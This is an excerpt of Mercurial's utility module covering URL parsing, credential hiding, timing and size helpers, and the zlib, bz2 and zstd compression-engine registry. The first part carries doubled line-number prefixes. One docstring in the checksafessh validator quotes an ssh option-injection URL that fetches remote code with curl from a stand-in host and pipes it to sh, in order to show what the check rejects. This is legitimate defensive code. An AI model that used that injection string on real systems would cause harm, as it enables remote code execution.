2779 2779 self.scheme = self.user = self.passwd = self.host = None
2780 2780 self.port = self.path = self.query = self.fragment = None
2781 2781 self._localpath = True
2782 2782 self._hostport = ''
2783 2783 self._origpath = path
2784 2784
2785 2785 if parsefragment and '#' in path:
2786 2786 path, self.fragment = path.split('#', 1)
2787 2787
2788 2788 # special case for Windows drive letters and UNC paths
2789 2789 if hasdriveletter(path) or path.startswith('\\\\'):
2790 2790 self.path = path
2791 2791 return
2792 2792
2793 2793 # For compatibility reasons, we can't handle bundle paths as
2794 2794 # normal URLs
2795 2795 if path.startswith('bundle:'):
2796 2796 self.scheme = 'bundle'
2797 2797 path = path[7:]
2798 2798 if path.startswith('//'):
2799 2799 path = path[2:]
2800 2800 self.path = path
2801 2801 return
2802 2802
2803 2803 if self._matchscheme(path):
2804 2804 parts = path.split(':', 1)
2805 2805 if parts[0]:
2806 2806 self.scheme, path = parts
2807 2807 self._localpath = False
2808 2808
2809 2809 if not path:
2810 2810 path = None
2811 2811 if self._localpath:
2812 2812 self.path = ''
2813 2813 return
2814 2814 else:
2815 2815 if self._localpath:
2816 2816 self.path = path
2817 2817 return
2818 2818
2819 2819 if parsequery and '?' in path:
2820 2820 path, self.query = path.split('?', 1)
2821 2821 if not path:
2822 2822 path = None
2823 2823 if not self.query:
2824 2824 self.query = None
2825 2825
2826 2826 # // is required to specify a host/authority
2827 2827 if path and path.startswith('//'):
2828 2828 parts = path[2:].split('/', 1)
2829 2829 if len(parts) > 1:
2830 2830 self.host, path = parts
2831 2831 else:
2832 2832 self.host = parts[0]
2833 2833 path = None
2834 2834 if not self.host:
2835 2835 self.host = None
2836 2836 # path of file:///d is /d
2837 2837 # path of file:///d:/ is d:/, not /d:/
2838 2838 if path and not hasdriveletter(path):
2839 2839 path = '/' + path
2840 2840
2841 2841 if self.host and '@' in self.host:
2842 2842 self.user, self.host = self.host.rsplit('@', 1)
2843 2843 if ':' in self.user:
2844 2844 self.user, self.passwd = self.user.split(':', 1)
2845 2845 if not self.host:
2846 2846 self.host = None
2847 2847
2848 2848 # Don't split on colons in IPv6 addresses without ports
2849 2849 if (self.host and ':' in self.host and
2850 2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 2851 self._hostport = self.host
2852 2852 self.host, self.port = self.host.rsplit(':', 1)
2853 2853 if not self.host:
2854 2854 self.host = None
2855 2855
2856 2856 if (self.host and self.scheme == 'file' and
2857 2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 2858 raise Abort(_('file:// URLs can only refer to localhost'))
2859 2859
2860 2860 self.path = path
2861 2861
2862 2862 # leave the query string escaped
2863 2863 for a in ('user', 'passwd', 'host', 'port',
2864 2864 'path', 'fragment'):
2865 2865 v = getattr(self, a)
2866 2866 if v is not None:
2867 2867 setattr(self, a, urlreq.unquote(v))
2868 2868
2869 2869 @encoding.strmethod
2870 2870 def __repr__(self):
2871 2871 attrs = []
2872 2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 2873 'query', 'fragment'):
2874 2874 v = getattr(self, a)
2875 2875 if v is not None:
2876 2876 attrs.append('%s: %r' % (a, v))
2877 2877 return '<url %s>' % ', '.join(attrs)
2878 2878
2879 2879 def __bytes__(self):
2880 2880 r"""Join the URL's components back into a URL string.
2881 2881
2882 2882 Examples:
2883 2883
2884 2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 2887 'http://user:pw@host:80/?foo=bar&baz=42'
2888 2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 2891 'ssh://user:pw@[::1]:2200//home/joe#'
2892 2892 >>> bytes(url(b'http://localhost:80//'))
2893 2893 'http://localhost:80//'
2894 2894 >>> bytes(url(b'http://localhost:80/'))
2895 2895 'http://localhost:80/'
2896 2896 >>> bytes(url(b'http://localhost:80'))
2897 2897 'http://localhost:80/'
2898 2898 >>> bytes(url(b'bundle:foo'))
2899 2899 'bundle:foo'
2900 2900 >>> bytes(url(b'bundle://../foo'))
2901 2901 'bundle:../foo'
2902 2902 >>> bytes(url(b'path'))
2903 2903 'path'
2904 2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 2905 'file:///tmp/foo/bar'
2906 2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 2907 'file:///c:/tmp/foo/bar'
2908 2908 >>> print(url(br'bundle:foo\bar'))
2909 2909 bundle:foo\bar
2910 2910 >>> print(url(br'file:///D:\data\hg'))
2911 2911 file:///D:\data\hg
2912 2912 """
2913 2913 if self._localpath:
2914 2914 s = self.path
2915 2915 if self.scheme == 'bundle':
2916 2916 s = 'bundle:' + s
2917 2917 if self.fragment:
2918 2918 s += '#' + self.fragment
2919 2919 return s
2920 2920
2921 2921 s = self.scheme + ':'
2922 2922 if self.user or self.passwd or self.host:
2923 2923 s += '//'
2924 2924 elif self.scheme and (not self.path or self.path.startswith('/')
2925 2925 or hasdriveletter(self.path)):
2926 2926 s += '//'
2927 2927 if hasdriveletter(self.path):
2928 2928 s += '/'
2929 2929 if self.user:
2930 2930 s += urlreq.quote(self.user, safe=self._safechars)
2931 2931 if self.passwd:
2932 2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 2933 if self.user or self.passwd:
2934 2934 s += '@'
2935 2935 if self.host:
2936 2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 2937 s += urlreq.quote(self.host)
2938 2938 else:
2939 2939 s += self.host
2940 2940 if self.port:
2941 2941 s += ':' + urlreq.quote(self.port)
2942 2942 if self.host:
2943 2943 s += '/'
2944 2944 if self.path:
2945 2945 # TODO: similar to the query string, we should not unescape the
2946 2946 # path when we store it, the path might contain '%2f' = '/',
2947 2947 # which we should *not* escape.
2948 2948 s += urlreq.quote(self.path, safe=self._safepchars)
2949 2949 if self.query:
2950 2950 # we store the query in escaped form.
2951 2951 s += '?' + self.query
2952 2952 if self.fragment is not None:
2953 2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 2954 return s
2955 2955
2956 2956 __str__ = encoding.strmethod(__bytes__)
2957 2957
2958 2958 def authinfo(self):
2959 2959 user, passwd = self.user, self.passwd
2960 2960 try:
2961 2961 self.user, self.passwd = None, None
2962 2962 s = bytes(self)
2963 2963 finally:
2964 2964 self.user, self.passwd = user, passwd
2965 2965 if not self.user:
2966 2966 return (s, None)
2967 2967 # authinfo[1] is passed to urllib2 password manager, and its
2968 2968 # URIs must not contain credentials. The host is passed in the
2969 2969 # URIs list because Python < 2.4.3 uses only that to search for
2970 2970 # a password.
2971 2971 return (s, (None, (s, self.host),
2972 2972 self.user, self.passwd or ''))
2973 2973
2974 2974 def isabs(self):
2975 2975 if self.scheme and self.scheme != 'file':
2976 2976 return True # remote URL
2977 2977 if hasdriveletter(self.path):
2978 2978 return True # absolute for our purposes - can't be joined()
2979 2979 if self.path.startswith(br'\\'):
2980 2980 return True # Windows UNC path
2981 2981 if self.path.startswith('/'):
2982 2982 return True # POSIX-style
2983 2983 return False
2984 2984
2985 2985 def localpath(self):
2986 2986 if self.scheme == 'file' or self.scheme == 'bundle':
2987 2987 path = self.path or '/'
2988 2988 # For Windows, we need to promote hosts containing drive
2989 2989 # letters to paths with drive letters.
2990 2990 if hasdriveletter(self._hostport):
2991 2991 path = self._hostport + '/' + self.path
2992 2992 elif (self.host is not None and self.path
2993 2993 and not hasdriveletter(path)):
2994 2994 path = '/' + path
2995 2995 return path
2996 2996 return self._origpath
2997 2997
2998 2998 def islocal(self):
2999 2999 '''whether localpath will return something that posixfile can open'''
3000 3000 return (not self.scheme or self.scheme == 'file'
3001 3001 or self.scheme == 'bundle')
3002 3002
3003 3003 def hasscheme(path):
3004 3004 return bool(url(path).scheme)
3005 3005
3006 3006 def hasdriveletter(path):
3007 3007 return path and path[1:2] == ':' and path[0:1].isalpha()
3008 3008
3009 3009 def urllocalpath(path):
3010 3010 return url(path, parsequery=False, parsefragment=False).localpath()
3011 3011
3012 3012 def checksafessh(path):
3013 3013 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3014 3014
3015 3015 This is a sanity check for ssh urls. ssh will parse the first item as
3016 3016 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3017 3017 Let's reject such potentially exploitable urls entirely and warn the
3018 3018 user.
3019 3019
3020 3020 Raises an error.Abort when the url is unsafe.
3021 3021 """
3022 3022 path = urlreq.unquote(path)
3023 3023 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3024 3024 raise error.Abort(_('potentially unsafe url: %r') %
3025 3025 (path,))
3026 3026
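# Example of a rejected url (doctest-style); without the check, ssh
# would parse the "host" as an -o option:
#
#   >>> checksafessh(b'ssh://-oProxyCommand=evil/path')
#   Traceback (most recent call last):
#     ...
#   Abort: potentially unsafe url: 'ssh://-oProxyCommand=evil/path'
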
3027 3027 def hidepassword(u):
3028 3028 '''hide user credential in a url string'''
3029 3029 u = url(u)
3030 3030 if u.passwd:
3031 3031 u.passwd = '***'
3032 3032 return bytes(u)
3033 3033
3034 3034 def removeauth(u):
3035 3035 '''remove all authentication information from a url string'''
3036 3036 u = url(u)
3037 3037 u.user = u.passwd = None
3038 3038 return str(u)
3039 3039
3040 3040 timecount = unitcountfn(
3041 3041 (1, 1e3, _('%.0f s')),
3042 3042 (100, 1, _('%.1f s')),
3043 3043 (10, 1, _('%.2f s')),
3044 3044 (1, 1, _('%.3f s')),
3045 3045 (100, 0.001, _('%.1f ms')),
3046 3046 (10, 0.001, _('%.2f ms')),
3047 3047 (1, 0.001, _('%.3f ms')),
3048 3048 (100, 0.000001, _('%.1f us')),
3049 3049 (10, 0.000001, _('%.2f us')),
3050 3050 (1, 0.000001, _('%.3f us')),
3051 3051 (100, 0.000000001, _('%.1f ns')),
3052 3052 (10, 0.000000001, _('%.2f ns')),
3053 3053 (1, 0.000000001, _('%.3f ns')),
3054 3054 )
3055 3055
3056 3056 _timenesting = [0]
3057 3057
3058 3058 def timed(func):
3059 3059 '''Report the execution time of a function call to stderr.
3060 3060
3061 3061 During development, use as a decorator when you need to measure
3062 3062 the cost of a function, e.g. as follows:
3063 3063
3064 3064 @util.timed
3065 3065 def foo(a, b, c):
3066 3066 pass
3067 3067 '''
3068 3068
3069 3069 def wrapper(*args, **kwargs):
3070 3070 start = timer()
3071 3071 indent = 2
3072 3072 _timenesting[0] += indent
3073 3073 try:
3074 3074 return func(*args, **kwargs)
3075 3075 finally:
3076 3076 elapsed = timer() - start
3077 3077 _timenesting[0] -= indent
3078 3078 stderr.write('%s%s: %s\n' %
3079 3079 (' ' * _timenesting[0], func.__name__,
3080 3080 timecount(elapsed)))
3081 3081 return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a size specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

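# Illustrative sketch, not part of the module: hooks run in lexicographic
# order of their source names, not in registration order. The function
# name is hypothetical.
def _demohooks():
    h = hooks()
    h.add('zz-ext', lambda: 'late')
    h.add('aa-ext', lambda: 'early')
    # Sorting on source name puts 'aa-ext' first.
    assert h() == ['early', 'late']
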
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    '''
    entries = [(fileline % (fn, ln), func)
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)
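
# Illustrative sketch, not part of the module: finddirs yields every proper
# ancestor directory of a path, deepest first, which is what the dirs
# multiset above builds its reference counts from. Hypothetical name.
def _demofinddirs():
    assert list(finddirs('a/b/c')) == ['a/b', 'a']
    # A path with no '/' has no ancestor directories.
    assert list(finddirs('file.txt')) == []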

# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # An engine may declare no external-facing bundle name; only
            # register the human name when one is present.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also
        implement ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

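# Illustrative sketch, not part of the module: the minimal shape of a
# custom engine. This hypothetical engine performs no real compression;
# a real one would typically also implement bundletype(),
# wireprotosupport() or revlogheader() to opt into those systems, and
# would be activated with compengines.register(_demoengine()).
class _demoengine(compressionengine):
    def name(self):
        return 'demo'

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh
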
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled
    # elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't by
    # default because, unless you are on a fast network, uncompressed
    # payloads can easily saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output.
            # However, it allows decompression to be more optimal since we
            # can pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
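
# Illustrative sketch, not part of the module: obtaining an engine from the
# global registry and round-tripping data through its streaming interface.
# The function name is hypothetical; zlib is used because it is always
# available, and stringio is the in-memory file type used elsewhere in this
# module.
def _demoroundtrip(data='x' * 4096):
    engine = compengines['zlib']
    compressed = ''.join(engine.compressstream(iter([data])))
    reader = engine.decompressorreader(stringio(compressed))
    assert reader.read(len(data)) == data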

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
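
# Illustrative sketch, not part of the module: safename probes oldname~tag,
# then oldname~tag~1, oldname~tag~2, ... until the name is free in both the
# context and the extra set. An empty dict stands in for a context with no
# files; the function name is hypothetical.
def _demosafename():
    assert safename('f.txt', 'orig', {}) == 'f.txt~orig'
    taken = {'f.txt~orig', 'f.txt~orig~1'}
    assert safename('f.txt', 'orig', {}, others=taken) == 'f.txt~orig~2'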